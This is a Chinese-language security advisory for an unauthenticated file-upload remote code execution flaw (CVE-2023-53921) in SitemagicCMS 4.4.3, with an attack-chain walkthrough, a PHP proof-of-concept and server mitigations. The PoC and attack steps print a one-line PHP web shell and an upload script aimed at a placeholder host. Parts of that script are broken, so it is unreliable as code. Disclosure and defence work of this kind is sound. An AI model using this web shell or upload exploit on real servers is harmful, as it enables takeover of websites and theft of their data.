CVE-2023-53921 SitemagicCMS 4.4.3 远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2023-53921

漏洞类型

远程代码执行

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

SitemagicCMS

漏洞概述

CVE-2023-53921是SitemagicCMS 4.4.3版本中的一个严重安全漏洞，CVSS评分高达9.8分，属于紧急严重级别。该漏洞源于SitemagicCMS在处理文件上传时缺乏有效的安全验证机制，允许未经认证的攻击者通过Web接口上传恶意PHP文件到服务器指定目录。SitemagicCMS是一款轻量级的内容管理系统，广泛应用于中小型网站建设中，其文件上传功能设计存在严重缺陷。攻击者利用此漏洞可以上传包含恶意代码的PHP或PHAR文件，这些文件一旦被服务器解析执行，攻击者即可在目标服务器上执行任意系统命令，从而完全控制受影响的Web应用程序和底层操作系统。该漏洞无需任何用户交互或认证凭证，攻击者可直接通过互联网发起攻击，具有极高的危害性和利用可行性。由于SitemagicCMS通常部署在Web服务器上，漏洞被利用后可能导致用户数据泄露、网站被篡改、服务器被植入后门等严重后果，攻击者还可能以受感染服务器为跳板进一步横向移动攻击内网其他系统。

技术细节

该漏洞的根本原因在于SitemagicCMS的文件上传模块未对用户上传的文件类型和内容进行充分的验证。系统允许用户将.php或.phar文件上传至files/images目录，而该目录通常位于Web可访问路径下，导致上传的恶意脚本可以被Web服务器直接执行。攻击者构造包含system()或exec()等函数调用的PHP代码，将其包装为.phar文件格式后通过系统的文件上传接口提交。服务器端未对上传文件的扩展名、MIME类型和实际内容进行严格的检查和过滤，攻击者可以通过修改文件扩展名（如使用.php3、.phtml）或利用phar反序列化等技术在服务器上执行任意系统命令。具体利用过程涉及以下技术要点：首先，攻击者构造包含恶意payload的PHP文件，payload中通常包含system($_GET['cmd'])或类似用于执行系统命令的代码；其次，通过SitemagicCMS的文件上传功能将恶意文件上传至files/images目录；最后，通过直接访问上传文件路径（如https://target.com/files/images/malicious.php）并附带cmd参数即可在服务器上执行任意系统命令，实现远程代码执行。

攻击链分析

STEP 1

步骤1

信息收集：攻击者首先访问目标网站，确认其运行SitemagicCMS 4.4.3或更早版本，并识别文件上传功能入口点

STEP 2

步骤2

构造恶意文件：攻击者创建包含系统命令执行代码的PHP文件，如<?php system($_GET['cmd']); ?>，并可选择包装为.phar格式

STEP 3

步骤3

绕过上传限制：利用文件扩展名绕过（如.php3、.phtml）或修改Content-Type头，尝试将恶意文件上传至files/images目录

STEP 4

步骤4

文件上传执行：服务器未对上传文件进行充分验证，恶意PHP文件被成功保存至Web可访问目录

STEP 5

步骤5

触发代码执行：攻击者通过HTTP请求直接访问上传的恶意文件路径，并附带cmd参数执行任意系统命令

STEP 6

步骤6

持久化控制：攻击者可进一步植入后门、建立持久连接、窃取敏感数据或横向移动攻击内网其他系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<?php
// CVE-2023-53921 PoC - SitemagicCMS Remote Code Execution
// Affected Version: SitemagicCMS <= 4.4.3
// Vulnerability: Unrestricted file upload leading to RCE

// Step 1: Generate malicious PHP file
$php_payload = '<?php system($_GET["cmd"]); ?>';
$filename = 'shell.php';

// Step 2: Upload the malicious file via SitemagicCMS file upload endpoint
$target_url = 'http://target.com/index.php?SMExt=SMFiles&TYPE=upload';

$post_data = [
    'file' => new CURLFile(realpath($filename), 'application/x-php', $filename)
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);

// Step 3: Execute command via uploaded shell
eval('$uploaded_file = "' . $response . '";');
$shell_url = 'http://target.com/files/images/' . $filename . '?cmd=whoami';

// Alternative: Direct file upload to files/images directory
// The vulnerability allows direct upload without proper validation
// Uploaded files are accessible via web root

// Payload for PHAR deserialization attack
// $phar = new Phar('exploit.phar');
// $phar->addFromString('test.txt', 'test');
// $phar->setStub('<?php __HALT_COMPILER(); ?>');
?>

影响范围

SitemagicCMS < 4.4.4

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：立即限制files/images等上传目录的PHP执行权限，在Web服务器配置中添加强制规则禁止该目录下所有脚本执行；对于Apache服务器可创建.htaccess文件设置php_flag engine off或使用<FilesMatch>规则阻止PHP执行；Nginx服务器可在server块中配置location ~* /files/.*\.php$ { deny all; }；同时临时禁用文件上传功能或实施严格的访问控制，仅允许授权用户上传文件；部署入侵检测系统监控异常的文件上传行为；建议尽快评估并实施官方提供的安全更新，将SitemagicCMS升级至最新稳定版本。